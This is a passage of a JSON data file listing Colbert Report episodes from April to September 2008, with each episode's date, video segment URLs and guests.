        "http://thecolbertreport.cc.com/videos/9v4qwg/electability",
        "http://thecolbertreport.cc.com/videos/ejbmnx/the-word---kernel-of-truth",
        "http://thecolbertreport.cc.com/videos/3osshb/sport-report---timbersports",
        "http://thecolbertreport.cc.com/videos/222rjo/feist"
      ],
      "guest": "Feist"
    },
    {
      "date": "2008-04-29",
      "videos": [
        "http://thecolbertreport.cc.com/videos/a1muh6/intro---4-29-08",
        "http://thecolbertreport.cc.com/videos/vc3sa7/obama-breaks-with-wright",
        "http://thecolbertreport.cc.com/videos/uk74h6/mccain-s-superstitions",
        "http://thecolbertreport.cc.com/videos/ry65tk/the-word---separation-of-church---plate",
        "http://thecolbertreport.cc.com/videos/cy9dmw/tip-wag---barbie",
        "http://thecolbertreport.cc.com/videos/s3buaq/anne-lamott"
      ],
      "guest": "Anne Lamott"
    },
    {
      "date": "2008-04-30",
      "videos": [
        "http://thecolbertreport.cc.com/videos/byoxj1/intro---4-30-08",
        "http://thecolbertreport.cc.com/videos/xju86c/salinger-watch",
        "http://thecolbertreport.cc.com/videos/1rdkem/donna-brazile-on-the-democratic-campaign",
        "http://thecolbertreport.cc.com/videos/4ngs9u/better-know-a-protectorate---guam---madeleine-bordallo-update",
        "http://thecolbertreport.cc.com/videos/vjk2cd/noah-feldman"
      ],
      "guest": "Donna Brazile, Noah Feldman"
    },
    {
      "date": "2008-05-01",
      "videos": [
        "http://thecolbertreport.cc.com/videos/1zd3gn/intro---5-01-08",
        "http://thecolbertreport.cc.com/videos/clfbo3/jenna-bush-wedding",
        "http://thecolbertreport.cc.com/videos/sctmlw/trailers-destroying-america---summer-movie-edition",
        "http://thecolbertreport.cc.com/videos/aka0f3/formidable-opponent---electability",
        "http://thecolbertreport.cc.com/videos/zck6ux/james-howard-kunstler"
      ],
      "guest": "James Kunstler"
    },
    {
      "date": "2008-05-05",
      "videos": [
        "http://thecolbertreport.cc.com/videos/nhsr7z/intro---5-05-08",
        "http://thecolbertreport.cc.com/videos/wtbn4l/time-s-2008-top-100-most-influential",
        "http://thecolbertreport.cc.com/videos/x20ttg/the-word---free-gas-",
        "http://thecolbertreport.cc.com/videos/oov14y/speed-racer",
        "http://thecolbertreport.cc.com/videos/91hddq/alpha-dog-of-the-week---911-operator",
        "http://thecolbertreport.cc.com/videos/2uj60r/carl-hiaasen",
        "http://thecolbertreport.cc.com/videos/k44vbf/rain-dance-off"
      ],
      "guest": "Carl Hiaasen"
    },
    {
      "date": "2008-05-06",
      "videos": [
        "http://thecolbertreport.cc.com/videos/e38w0k/intro---5-06-08",
        "http://thecolbertreport.cc.com/videos/e3fb1q/sexy-voice-study",
        "http://thecolbertreport.cc.com/videos/qy6hoq/the-word---collateral-friendage",
        "http://thecolbertreport.cc.com/videos/byyq8n/stephen-s-sound-advice---karl-s-advice",
        "http://thecolbertreport.cc.com/videos/y777b4/nathan-gunn"
      ],
      "guest": "Nathan Gunn"
    },
    {
      "date": "2008-05-07",
      "videos": [
        "http://thecolbertreport.cc.com/videos/fk83lx/intro---5-07-08",
        "http://thecolbertreport.cc.com/videos/20qjta/stephen-colbert-s-shockettes",
        "http://thecolbertreport.cc.com/videos/su4v1v/terrorist-nelson-mandela",
        "http://thecolbertreport.cc.com/videos/07p71k/hasan-elahi",
        "http://thecolbertreport.cc.com/videos/bc4u9e/democralypse-now---justin-myers",
        "http://thecolbertreport.cc.com/videos/av0o9p/george-johnson"
      ],
      "guest": "Hasan Elahi, George Johnson"
    },
    {
      "date": "2008-05-08",
      "videos": [
        "http://thecolbertreport.cc.com/videos/ey98z2/exclusive---stephen-vs--rain",
        "http://thecolbertreport.cc.com/videos/6wn8i5/garrett-reisman",
        "http://thecolbertreport.cc.com/videos/qnk6x8/gas-dollar",
        "http://thecolbertreport.cc.com/videos/txq3hp/arianna-huffington",
        "http://thecolbertreport.cc.com/videos/uafvva/r-i-p--albert-hoffman"
      ],
      "guest": "Arianna Huffington"
    },
    {
      "date": "2008-05-12",
      "videos": [
        "http://thecolbertreport.cc.com/videos/da4u0g/intro---5-12-08",
        "http://thecolbertreport.cc.com/videos/tj7sih/big-russ",
        "http://thecolbertreport.cc.com/videos/kdeptj/cold-war-update---russia",
        "http://thecolbertreport.cc.com/videos/k7k3ke/threatdown---cute-bears",
        "http://thecolbertreport.cc.com/videos/3i279j/dr--mehmet-oz"
      ],
      "guest": "Dr. Mehmet Oz"
    },
    {
      "date": "2008-05-13",
      "videos": [
        "http://thecolbertreport.cc.com/videos/oycul0/exclusive---better-know-a-lobby---brady-campaign-to-prevent-gun-violence",
        "http://thecolbertreport.cc.com/videos/1siped/intro---5-13-08",
        "http://thecolbertreport.cc.com/videos/mpq03a/hillary-drop-out",
        "http://thecolbertreport.cc.com/videos/qxr59r/bill-o-reilly-inside-edition",
        "http://thecolbertreport.cc.com/videos/np2mes/better-know-a-lobby---brady-campaign-to-prevent-gun-violence",
        "http://thecolbertreport.cc.com/videos/24b8xh/jennifer-hooper-mccarty"
      ],
      "guest": "Jennifer Hooper McCarty"
    },
    {
      "date": "2008-05-14",
      "videos": [
        "http://thecolbertreport.cc.com/videos/suewpq/intro---5-14-08",
        "http://thecolbertreport.cc.com/videos/fygt2g/edwards-supports-obama",
        "http://thecolbertreport.cc.com/videos/ry9ff3/who-s-not-honoring-me-now----science",
        "http://thecolbertreport.cc.com/videos/xnkjrq/the-word---declaration-of-warming",
        "http://thecolbertreport.cc.com/videos/gxghyw/laura-dern",
        "http://thecolbertreport.cc.com/videos/4tldfc/grover-norquist",
        "http://thecolbertreport.cc.com/videos/zujfq0/the-show-comes-to-an-end"
      ],
      "guest": "Laura Dern, Grover Norquist"
    },
    {
      "date": "2008-05-15",
      "videos": [
        "http://thecolbertreport.cc.com/videos/nkmoxa/intro---5-15-08",
        "http://thecolbertreport.cc.com/videos/ekfqs4/american-craft-beer-week",
        "http://thecolbertreport.cc.com/videos/wy0c00/edwards-endorses-obama",
        "http://thecolbertreport.cc.com/videos/scm34l/the-word---jail-sweet-jail",
        "http://thecolbertreport.cc.com/videos/ak0o7t/bears---balls---dollar-stores",
        "http://thecolbertreport.cc.com/videos/rarvxz/andrei-cherny"
      ],
      "guest": "Andrei Cherny"
    },
    {
      "date": "2008-05-27",
      "videos": [
        "http://thecolbertreport.cc.com/videos/v79z0o/intro---5-27-08",
        "http://thecolbertreport.cc.com/videos/k0kiom/fleet-week",
        "http://thecolbertreport.cc.com/videos/xuhumb/mccain-s-preachers",
        "http://thecolbertreport.cc.com/videos/dxmleo/tony-perkins",
        "http://thecolbertreport.cc.com/videos/o5c67w/brian-greene"
      ],
      "guest": "Tony Perkins, Brian Greene"
    },
    {
      "date": "2008-05-28",
      "videos": [
        "http://thecolbertreport.cc.com/videos/tuxwuw/intro---5-28-08",
        "http://thecolbertreport.cc.com/videos/euhkkf/microbe-beat-",
        "http://thecolbertreport.cc.com/videos/z1nl4c/the-word---brushback-pitch",
        "http://thecolbertreport.cc.com/videos/jhmlmk/cheating-death---liquid-launch",
        "http://thecolbertreport.cc.com/videos/ngaz1d/claire-mccaskill"
      ],
      "guest": "Sen. Claire McCaskill"
    },
    {
      "date": "2008-05-29",
      "videos": [
        "http://thecolbertreport.cc.com/videos/6wfa6q/intro---5-29-08",
        "http://thecolbertreport.cc.com/videos/79u1cf/shout-out----broken-space-toilet",
        "http://thecolbertreport.cc.com/videos/6735i1/democralypse-now---florida-and-michigan",
        "http://thecolbertreport.cc.com/videos/ug78n1/tad-devine",
        "http://thecolbertreport.cc.com/videos/lhma93/tip-wag---monetary-discrimination",
        "http://thecolbertreport.cc.com/videos/3qprbm/david-sirota",
        "http://thecolbertreport.cc.com/videos/g0kftc/sneak-preview"
      ],
      "guest": "Tad Devine, David Sirota"
    },
    {
      "date": "2008-06-02",
      "videos": [
        "http://thecolbertreport.cc.com/videos/hrlfp0/intro---6-02-08",
        "http://thecolbertreport.cc.com/videos/dvmsby/obama-s-church",
        "http://thecolbertreport.cc.com/videos/38jpc2/fire-at-universal",
        "http://thecolbertreport.cc.com/videos/jlvsj6/the-word---media-culpa",
        "http://thecolbertreport.cc.com/videos/8cygn0/colbert-platinum---private-jets",
        "http://thecolbertreport.cc.com/videos/p0u6f8/jon-paskowitz",
        "http://thecolbertreport.cc.com/videos/piym7c/final-thought"
      ],
      "guest": "Jon Paskowitz"
    },
    {
      "date": "2008-06-03",
      "videos": [
        "http://thecolbertreport.cc.com/videos/4vr7xb/intro---6-03-08",
        "http://thecolbertreport.cc.com/videos/o005k6/democratic-primaries-over",
        "http://thecolbertreport.cc.com/videos/viwun3/the-word---unhealthy-competition",
        "http://thecolbertreport.cc.com/videos/po30h9/stephen-s-sound-advice---summer-jobs",
        "http://thecolbertreport.cc.com/videos/xhigi4/george-will"
      ],
      "guest": "George Will"
    },
    {
      "date": "2008-06-04",
      "videos": [
        "http://thecolbertreport.cc.com/videos/0w2khv/intro---6-04-08",
        "http://thecolbertreport.cc.com/videos/hfq15q/john-mccain-s-green-screen-challenge",
        "http://thecolbertreport.cc.com/videos/wsbc0i/libertarian-party---bob-barr",
        "http://thecolbertreport.cc.com/videos/sn90ui/salman-rushdie",
        "http://thecolbertreport.cc.com/videos/uji4o5/the-lost-o-reilly-tapes-pt--2"
      ],
      "guest": "Rep. Bob Barr, Salman Rushdie"
    },
    {
      "date": "2008-06-05",
      "videos": [
        "http://thecolbertreport.cc.com/videos/yv02dd/intro---6-05-08",
        "http://thecolbertreport.cc.com/videos/n90wjr/the-andromeda-strain",
        "http://thecolbertreport.cc.com/videos/ugt12v/the-word---oh--the-places-you-ll-stay",
        "http://thecolbertreport.cc.com/videos/6nrkel/sport-report---mike-forrester",
        "http://thecolbertreport.cc.com/videos/ibt0j9/pat-buchanan"
      ],
      "guest": "Pat Buchanan"
    },
    {
      "date": "2008-06-09",
      "videos": [
        "http://thecolbertreport.cc.com/videos/qowh4f/intro---6-09-08",
        "http://thecolbertreport.cc.com/videos/icuy8o/democralypse-now---hillary-concedes",
        "http://thecolbertreport.cc.com/videos/numnri/the-word---if-at-first-you-don-t-secede",
        "http://thecolbertreport.cc.com/videos/vlab0d/threatdown---secret-negro-presidents",
        "http://thecolbertreport.cc.com/videos/gv27al/philip-weiss"
      ],
      "guest": "Phil Weiss"
    },
    {
      "date": "2008-06-10",
      "videos": [
        "http://thecolbertreport.cc.com/videos/705tqw/intro---6-10-08",
        "http://thecolbertreport.cc.com/videos/cbjixz/new-giant-iphone",
        "http://thecolbertreport.cc.com/videos/w5you4/tickling-the-rocks",
        "http://thecolbertreport.cc.com/videos/skw5sl/the-elitist-menace-among-us",
        "http://thecolbertreport.cc.com/videos/qhpj5f/smokin--pole---canada-s-hockey-theme",
        "http://thecolbertreport.cc.com/videos/9bdggo/alan-rabinowitz"
      ],
      "guest": "Alan Rabinowitz"
    },
    {
      "date": "2008-06-11",
      "videos": [
        "http://thecolbertreport.cc.com/videos/373j1n/intro---6-11-08",
        "http://thecolbertreport.cc.com/videos/gbgmuk/israel-s-new-bird",
        "http://thecolbertreport.cc.com/videos/twddgu/the-word---u-s--airweighs",
        "http://thecolbertreport.cc.com/videos/pp8c40/un-american-news---u-s--election-edition",
        "http://thecolbertreport.cc.com/videos/zudzs0/david-hajdu",
        "http://thecolbertreport.cc.com/videos/idly59/memorized-script"
      ],
      "guest": "David Hajdu"
    },
    {
      "date": "2008-06-12",
      "videos": [
        "http://thecolbertreport.cc.com/videos/mpfrre/intro---6-12-08",
        "http://thecolbertreport.cc.com/videos/nsgvgc/stephen-colbert-s-make-mccain-exciting-challenge-",
        "http://thecolbertreport.cc.com/videos/86su5q/winona-laduke",
        "http://thecolbertreport.cc.com/videos/qrbimj/we-the-mediator",
        "http://thecolbertreport.cc.com/videos/t6nh85/dickson-despommier"
      ],
      "guest": "Winona LaDuke, Dickson Despommier"
    },
    {
      "date": "2008-06-16",
      "videos": [
        "http://thecolbertreport.cc.com/videos/vnwwom/intro---6-16-08",
        "http://thecolbertreport.cc.com/videos/6vk2ye/tim-russert-tribute",
        "http://thecolbertreport.cc.com/videos/mpqoje/the-word---ploy-cott",
        "http://thecolbertreport.cc.com/videos/cqvvlk/the-enemy-within---wizard-teachers",
        "http://thecolbertreport.cc.com/videos/8xg385/kenneth-miller"
      ],
      "guest": "Kenneth R. Miller"
    },
    {
      "date": "2008-06-17",
      "videos": [
        "http://thecolbertreport.cc.com/videos/jfofbj/intro---6-17-08",
        "http://thecolbertreport.cc.com/videos/kwlu8o/peabody-award",
        "http://thecolbertreport.cc.com/videos/tapfcu/neal-katyal",
        "http://thecolbertreport.cc.com/videos/fuhy6f/sport-report---timbersports-championship",
        "http://thecolbertreport.cc.com/videos/vcz3hv/jonathan-zittrain",
        "http://thecolbertreport.cc.com/videos/ci1ljt/peabody-on-mantel"
      ],
      "guest": "Neal Katyal, Jonathan Zittrain"
    },
    {
      "date": "2008-06-18",
      "videos": [
        "http://thecolbertreport.cc.com/videos/b2ddmd/intro---6-18-08",
        "http://thecolbertreport.cc.com/videos/prx5o1/the-new-smurfs-movie",
        "http://thecolbertreport.cc.com/videos/ciovvr/the-word---lexicon-artist",
        "http://thecolbertreport.cc.com/videos/vtx5qc/barack-obama-s-church-search---dr--uma-mysorekar",
        "http://thecolbertreport.cc.com/videos/ir7gne/junot-diaz"
      ],
      "guest": "Dr. Uma Mysorekar, Junot Diaz"
    },
    {
      "date": "2008-06-19",
      "videos": [
        "http://thecolbertreport.cc.com/videos/d6b6nb/intro---6-19-08",
        "http://thecolbertreport.cc.com/videos/6sj17e/shout-out---peabody-awards",
        "http://thecolbertreport.cc.com/videos/mr1053/sean-hannity-loves-america",
        "http://thecolbertreport.cc.com/videos/zcd35g/cookie-monster",
        "http://thecolbertreport.cc.com/videos/aytt4h/make-mccain-exciting-challenge---the-secret-of-mccain-s-brain",
        "http://thecolbertreport.cc.com/videos/m7daav/bishop-n-t--wright",
        "http://thecolbertreport.cc.com/videos/der3el/stephen-s-missing-peabody"
      ],
      "guest": "Bishop N.T. Wright"
    },
    {
      "date": "2008-06-23",
      "videos": [
        "http://thecolbertreport.cc.com/videos/ua8qbe/intro---6-23-08",
        "http://thecolbertreport.cc.com/videos/a4nt5i/wriststrong-anniversary",
        "http://thecolbertreport.cc.com/videos/kj72hq/the-word---black-and-white",
        "http://thecolbertreport.cc.com/videos/vlidof/tip-wag---barack-obama",
        "http://thecolbertreport.cc.com/videos/ymze92/barbara-ehrenreich",
        "http://thecolbertreport.cc.com/videos/1f40by/sign-off---time-for-stephen-to-watch"
      ],
      "guest": "Barbara Ehrenreich"
    },
    {
      "date": "2008-06-24",
      "videos": [
        "http://thecolbertreport.cc.com/videos/mhd7wr/intro---6-24-08",
        "http://thecolbertreport.cc.com/videos/n11h6w/hollywood-face-violence",
        "http://thecolbertreport.cc.com/videos/ov4362/oil-crisis",
        "http://thecolbertreport.cc.com/videos/hxtoyj/the-word---bleep",
        "http://thecolbertreport.cc.com/videos/f5yznc/dr--jason-bond",
        "http://thecolbertreport.cc.com/videos/ilejmp/will-smith"
      ],
      "guest": "Jason Bond, Will Smith"
    },
    {
      "date": "2008-06-25",
      "videos": [
        "http://thecolbertreport.cc.com/videos/mdtg3q/intro---6-25-08",
        "http://thecolbertreport.cc.com/videos/q0qc77/paul-goldberger",
        "http://thecolbertreport.cc.com/videos/ajsxzq/judge--jury---executioner---whales",
        "http://thecolbertreport.cc.com/videos/zucjth/neil-degrasse-tyson",
        "http://thecolbertreport.cc.com/videos/2r47v6/stephen-s-gun"
      ],
      "guest": "Paul Goldberger, Neil deGrasse Tyson"
    },
    {
      "date": "2008-06-26",
      "videos": [
        "http://thecolbertreport.cc.com/videos/gvc60t/intro---6-26-08",
        "http://thecolbertreport.cc.com/videos/038ej3/stephen-and-sweetness",
        "http://thecolbertreport.cc.com/videos/txteih/the-tank-is-half-full---criminals",
        "http://thecolbertreport.cc.com/videos/hdan1z/difference-makers---steve-pelkey",
        "http://thecolbertreport.cc.com/videos/6vucxh/robert-wexler",
        "http://thecolbertreport.cc.com/videos/s7cul5/stephen-packs-for-his-trip"
      ],
      "guest": "Rep. Robert Wexler"
    },
    {
      "date": "2008-07-14",
      "videos": [
        "http://thecolbertreport.cc.com/videos/a4vl00/intro---7-14-08",
        "http://thecolbertreport.cc.com/videos/t1ic5h/belgians-buy-budweiser",
        "http://thecolbertreport.cc.com/videos/e8zxmm/the-word---priceless",
        "http://thecolbertreport.cc.com/videos/6fnysv/barack-obama-s-church-search---lama-surya-das",
        "http://thecolbertreport.cc.com/videos/iuafl5/daniel-c--esty",
        "http://thecolbertreport.cc.com/videos/zeelo6/one-last-sip"
      ],
      "guest": "Lama Surya Das, Daniel C. Esty"
    },
    {
      "date": "2008-07-15",
      "videos": [
        "http://thecolbertreport.cc.com/videos/btd58c/intro---7-15-08",
        "http://thecolbertreport.cc.com/videos/iojfbw/the-new-yorker-cover",
        "http://thecolbertreport.cc.com/videos/4r3fs4/julia-e--sweig",
        "http://thecolbertreport.cc.com/videos/slbivd/difference-makers---donald-trump",
        "http://thecolbertreport.cc.com/videos/w3v1ei/jason-riley"
      ],
      "guest": "Julia E. Sweig, Jason Riley"
    },
    {
      "date": "2008-07-16",
      "videos": [
        "http://thecolbertreport.cc.com/videos/apzepe/intro---7-16-08",
        "http://thecolbertreport.cc.com/videos/nxgrjc/rush-is-here",
        "http://thecolbertreport.cc.com/videos/u9v0kj/the-word---placebo",
        "http://thecolbertreport.cc.com/videos/r6ylvr/alpha-dog-of-the-week---george-w--bush"
      ],
      "guest": "Rush"
    },
    {
      "date": "2008-07-17",
      "videos": [
        "http://thecolbertreport.cc.com/videos/fv156w/intro---7-17-08",
        "http://thecolbertreport.cc.com/videos/hy6e1y/ofec",
        "http://thecolbertreport.cc.com/videos/fdazma/tip-wag---9-11-billboard",
        "http://thecolbertreport.cc.com/videos/75y9kg/green-screen-challenge---bill-o-reilly-rant",
        "http://thecolbertreport.cc.com/videos/ti6y23/elizabeth-edwards",
        "http://thecolbertreport.cc.com/videos/2i4pii/esquire-cover"
      ],
      "guest": "Elizabeth Edwards"
    },
    {
      "date": "2008-07-21",
      "videos": [
        "http://thecolbertreport.cc.com/videos/ypasrv/exclusive---better-know-a-lobby---sierra-club",
        "http://thecolbertreport.cc.com/videos/298hev/intro---7-21-08",
        "http://thecolbertreport.cc.com/videos/2uxo91/barack-obama-s-elitist-summer-abroad",
        "http://thecolbertreport.cc.com/videos/ytt7lh/better-know-a-lobby---sierra-club",
        "http://thecolbertreport.cc.com/videos/7zt9o1/jim-webb"
      ],
      "guest": "Sen. Jim Webb"
    },
    {
      "date": "2008-07-22",
      "videos": [
        "http://thecolbertreport.cc.com/videos/isgn6o/intro---7-22-08",
        "http://thecolbertreport.cc.com/videos/5us80y/obama-s-trip",
        "http://thecolbertreport.cc.com/videos/twxrmk/the-word---fight-to-the-furnish",
        "http://thecolbertreport.cc.com/videos/g536lz/elton-john-s-new-ice-cream",
        "http://thecolbertreport.cc.com/videos/dqvjy7/south-carolina-is-so-gay",
        "http://thecolbertreport.cc.com/videos/ypbiy1/margaret-spellings"
      ],
      "guest": "Margaret Spellings"
    },
    {
      "date": "2008-07-23",
      "videos": [
        "http://thecolbertreport.cc.com/videos/ephzov/intro---7-23-08",
        "http://thecolbertreport.cc.com/videos/008wql/starbucks-closings",
        "http://thecolbertreport.cc.com/videos/ckerul/the-word---join-the-european-union",
        "http://thecolbertreport.cc.com/videos/p099m0/colorofchange-org-petition",
        "http://thecolbertreport.cc.com/videos/ef4747/nas-pt--1"
      ],
      "guest": "Nas"
    },
    {
      "date": "2008-07-24",
      "videos": [
        "http://thecolbertreport.cc.com/videos/9e4ipx/intro---7-24-08",
        "http://thecolbertreport.cc.com/videos/mzk1jw/john-mccain-s-sausage-party",
        "http://thecolbertreport.cc.com/videos/y6db2n/laurie-goodstein",
        "http://thecolbertreport.cc.com/videos/oyh9ck/threatdown---greek-courts",
        "http://thecolbertreport.cc.com/videos/qkxsxv/garrett-reisman",
        "http://thecolbertreport.cc.com/videos/my4p2n/decoder-rings"
      ],
      "guest": "Laurie Goodstein, Garrett Reisman"
    },
    {
      "date": "2008-07-28",
      "videos": [
        "http://thecolbertreport.cc.com/videos/5mv6ij/intro---7-28-08",
        "http://thecolbertreport.cc.com/videos/ahi7x5/obama-returns",
        "http://thecolbertreport.cc.com/videos/n5o1z2/heroic-refusal-to-discuss-robert-novak",
        "http://thecolbertreport.cc.com/videos/wksh33/trigger-happy---d-c--v--heller",
        "http://thecolbertreport.cc.com/videos/2fxv2r/toby-keith"
      ],
      "guest": "Toby Keith"
    },
    {
      "date": "2008-07-29",
      "videos": [
        "http://thecolbertreport.cc.com/videos/8y4ush/intro---7-29-08",
        "http://thecolbertreport.cc.com/videos/ft9iza/mccain-s-mustache",
        "http://thecolbertreport.cc.com/videos/je97nz/the-word---honest-belief",
        "http://thecolbertreport.cc.com/videos/079fu3/better-know-a-district---new-york-s-14th---carolyn-maloney",
        "http://thecolbertreport.cc.com/videos/4pok23/eric-roston"
      ],
      "guest": "Eric Roston"
    },
    {
      "date": "2008-07-30",
      "videos": [
        "http://thecolbertreport.cc.com/videos/aej937/intro---7-30-08",
        "http://thecolbertreport.cc.com/videos/0igq3j/fat-cat",
        "http://thecolbertreport.cc.com/videos/z8lld1/the-word---save-ferris",
        "http://thecolbertreport.cc.com/videos/77hd54/spiders-for-stephen-",
        "http://thecolbertreport.cc.com/videos/9riu8g/canton-apology",
        "http://thecolbertreport.cc.com/videos/paplnu/crosby--stills---nash-pt--1"
      ],
      "guest": "Crosby, Stills & Nash"
    },
    {
      "date": "2008-07-31",
      "videos": [
        "http://thecolbertreport.cc.com/videos/2yeaq8/intro---7-31-08",
        "http://thecolbertreport.cc.com/videos/cy7kpu/starbucks-cuts-jobs",
        "http://thecolbertreport.cc.com/videos/evgv9c/brendan-koerner",
        "http://thecolbertreport.cc.com/videos/3pi9ch/cheating-death---swimming-safety",
        "http://thecolbertreport.cc.com/videos/k8sku2/buzz-aldrin",
        "http://thecolbertreport.cc.com/videos/xrkpup/thanks-to-the-guests"
      ],
      "guest": "Brendan I. Koerner, Buzz Aldrin"
    },
    {
      "date": "2008-08-04",
      "videos": [
        "http://thecolbertreport.cc.com/videos/y56p3h/intro---8-4-08",
        "http://thecolbertreport.cc.com/videos/j7c1ly/democrats--five-week-recess",
        "http://thecolbertreport.cc.com/videos/n4qhgk/the-word---we-the-people",
        "http://thecolbertreport.cc.com/videos/gjy6co/ryan-seacrest-s-shark-attack",
        "http://thecolbertreport.cc.com/videos/j0iwzv/lucas-conley"
      ],
      "guest": "Lucas Conley, The Apples in Stereo"
    },
    {
      "date": "2008-08-05",
      "videos": [
        "http://thecolbertreport.cc.com/videos/0b9ndt/intro---8-5-08",
        "http://thecolbertreport.cc.com/videos/a60qui/starbucks-promotion",
        "http://thecolbertreport.cc.com/videos/ts3set/obama-s-energy-plan---tire-gauges",
        "http://thecolbertreport.cc.com/videos/c8orpt/the-word---divided-we-win",
        "http://thecolbertreport.cc.com/videos/u7dbu9/canton--kansas-apology",
        "http://thecolbertreport.cc.com/videos/sw0u58/david-carr",
        "http://thecolbertreport.cc.com/videos/zghj54/obsessive-compulsive-checklist"
      ],
      "guest": "David Carr"
    },
    {
      "date": "2008-08-06",
      "videos": [
        "http://thecolbertreport.cc.com/videos/j12mau/intro---8-6-08",
        "http://thecolbertreport.cc.com/videos/ad4cbz/ignorance-history-month",
        "http://thecolbertreport.cc.com/videos/v2zmtk/spida-of-love---jason-bond",
        "http://thecolbertreport.cc.com/videos/luli3g/colbert-platinum---the-dribble-down-effect",
        "http://thecolbertreport.cc.com/videos/3pe5h3/kevin-costner",
        "http://thecolbertreport.cc.com/videos/ot8cw0/spanish-audio"
      ],
      "guest": "Jason Bond, Kevin Costner"
    },
    {
      "date": "2008-08-07",
      "videos": [
        "http://thecolbertreport.cc.com/videos/bxoz3a/intro---8-7-08",
        "http://thecolbertreport.cc.com/videos/e6qhsv/osama-bin-laden-s-driver-guilty",
        "http://thecolbertreport.cc.com/videos/f3opxi/sport-report---devin-gordon",
        "http://thecolbertreport.cc.com/videos/6u4m61/tip-wag---exxon-s-record-profits",
        "http://thecolbertreport.cc.com/videos/dmymte/thomas-frank",
        "http://thecolbertreport.cc.com/videos/iwrdpe/reading-newsweek"
      ],
      "guest": "Devin Gordon, Thomas Frank"
    },
    {
      "date": "2008-08-11",
      "videos": [
        "http://thecolbertreport.cc.com/videos/jk0e27/intro---8-11-08",
        "http://thecolbertreport.cc.com/videos/riwpa4/esteban-loves-jorge-ramos",
        "http://thecolbertreport.cc.com/videos/bfwvvn/the-word---catharsis",
        "http://thecolbertreport.cc.com/videos/txv0gu/nailed--em---medical-marijuana",
        "http://thecolbertreport.cc.com/videos/8j40t0/jorge-ramos",
        "http://thecolbertreport.cc.com/videos/b7houz/stephen-wants-snacks"
      ],
      "guest": "Jorge Ramos"
    },
    {
      "date": "2008-08-12",
      "videos": [
        "http://thecolbertreport.cc.com/videos/kt49i5/intro---8-12-08",
        "http://thecolbertreport.cc.com/videos/zgupdj/unsubstantiated-rumors",
        "http://thecolbertreport.cc.com/videos/6d57uu/olympic-opening-ceremony",
        "http://thecolbertreport.cc.com/videos/5njkui/joey-cheek",
        "http://thecolbertreport.cc.com/videos/jhg2wn/canton--south-dakota-apology",
        "http://thecolbertreport.cc.com/videos/bv3152/jane-mayer",
        "http://thecolbertreport.cc.com/videos/dwnfyl/reading-the-national-enquirer"
      ],
      "guest": "Joey Cheek, Jane Mayer"
    },
    {
      "date": "2008-08-13",
      "videos": [
        "http://thecolbertreport.cc.com/videos/o7nbb7/intro---8-13-08",
        "http://thecolbertreport.cc.com/videos/zewvls/stephen-s-world-record",
        "http://thecolbertreport.cc.com/videos/3ae93q/john-mccain-steals-from-wikipedia",
        "http://thecolbertreport.cc.com/videos/htzkd9/the-word---blame-monica-goodling",
        "http://thecolbertreport.cc.com/videos/1clyqz/formidable-opponent---offshore-drilling",
        "http://thecolbertreport.cc.com/videos/yplzsy/dick-meyer",
        "http://thecolbertreport.cc.com/videos/x9tyb8/goodbye-from-wprg"
      ],
      "guest": "Dick Meyer"
    },
    {
      "date": "2008-08-14",
      "videos": [
        "http://thecolbertreport.cc.com/videos/481cqy/intro---8-14-08",
        "http://thecolbertreport.cc.com/videos/0gs1a9/jeopardy-shout-out",
        "http://thecolbertreport.cc.com/videos/s99fxp/threatdown---killer-iphones",
        "http://thecolbertreport.cc.com/videos/9x55ta/the-1952-helsinki-games---the-reindeer-roars",
        "http://thecolbertreport.cc.com/videos/ebnqyp/bing-west",
        "http://thecolbertreport.cc.com/videos/h0yxjt/gold-medals"
      ],
      "guest": "Bing West"
    },
    {
      "date": "2008-08-26",
      "videos": [
        "http://thecolbertreport.cc.com/videos/r6ivli/intro---8-26-08",
        "http://thecolbertreport.cc.com/videos/zpxtn2/burning-man-festival-confusion",
        "http://thecolbertreport.cc.com/videos/ez5jp1/michelle-obama-s-speech",
        "http://thecolbertreport.cc.com/videos/tojy8p/anniversary-pandering",
        "http://thecolbertreport.cc.com/videos/ax1v4e/bob-barr",
        "http://thecolbertreport.cc.com/videos/f120f5/scott-mcclellan",
        "http://thecolbertreport.cc.com/videos/twqqkj/up-next"
      ],
      "guest": "Rep. Bob Barr, Scott McClellan"
    },
    {
      "date": "2008-08-27",
      "videos": [
        "http://thecolbertreport.cc.com/videos/mb4pgm/intro---8-27-08",
        "http://thecolbertreport.cc.com/videos/63yvi3/live-from-dynasty",
        "http://thecolbertreport.cc.com/videos/xfzios/hillary-clinton-supports-barack-obama",
        "http://thecolbertreport.cc.com/videos/m1mag5/repo-man",
        "http://thecolbertreport.cc.com/videos/402muh/mike-huckabee",
        "http://thecolbertreport.cc.com/videos/llvqjv/stephanie-tubbs-jones-tribute"
      ],
      "guest": "Gov. Mike Huckabee"
    },
    {
      "date": "2008-08-28",
      "videos": [
        "http://thecolbertreport.cc.com/videos/ua1ppo/intro---8-28-08",
        "http://thecolbertreport.cc.com/videos/9lke5e/high-altitude-brownies",
        "http://thecolbertreport.cc.com/videos/53s26i/the-word---acid-flashback",
        "http://thecolbertreport.cc.com/videos/kmna3f/dnc-formal-roll-call",
        "http://thecolbertreport.cc.com/videos/eifqog/richard-brookhiser",
        "http://thecolbertreport.cc.com/videos/c42fhd/stephen-s-brownies"
      ],
      "guest": "Rick Brookhiser"
    },
    {
      "date": "2008-08-29",
      "videos": [
        "http://thecolbertreport.cc.com/videos/7p5vgn/intro---8-29-08",
        "http://thecolbertreport.cc.com/videos/ctsiz5/sarah-palin-for-vp",
        "http://thecolbertreport.cc.com/videos/9os3w0/better-know-a-lobby---secular-coalition-for-america",
        "http://thecolbertreport.cc.com/videos/rufbl6/john-mcwhorter",
        "http://thecolbertreport.cc.com/videos/bzvjxb/revenge-of-the-styrofoam-cups"
      ],
      "guest": "John McWhorter"
    },
    {
      "date": "2008-09-02",
      "videos": [
        "http://thecolbertreport.cc.com/videos/hp450x/intro---9-2-08",
        "http://thecolbertreport.cc.com/videos/8tw46w/stephen-from-four-years-ago",
        "http://thecolbertreport.cc.com/videos/rf8uos/the-word---that-s-the-ticket",
        "http://thecolbertreport.cc.com/videos/gmnlx9/green-screen-challenge---last-shot",
        "http://thecolbertreport.cc.com/videos/f81p33/laura-d-andrea-tyson",
        "http://thecolbertreport.cc.com/videos/xhysj6/blowing-your-mind"
      ],
      "guest": "Laura D'Andrea Tyson"
    },
    {
      "date": "2008-09-03",
      "videos": [
        "http://thecolbertreport.cc.com/videos/gujtwh/intro---9-3-08",
        "http://thecolbertreport.cc.com/videos/kepht9/stephen-is-in-new-orleans",
        "http://thecolbertreport.cc.com/videos/sbatmc/rnc-tuesday",
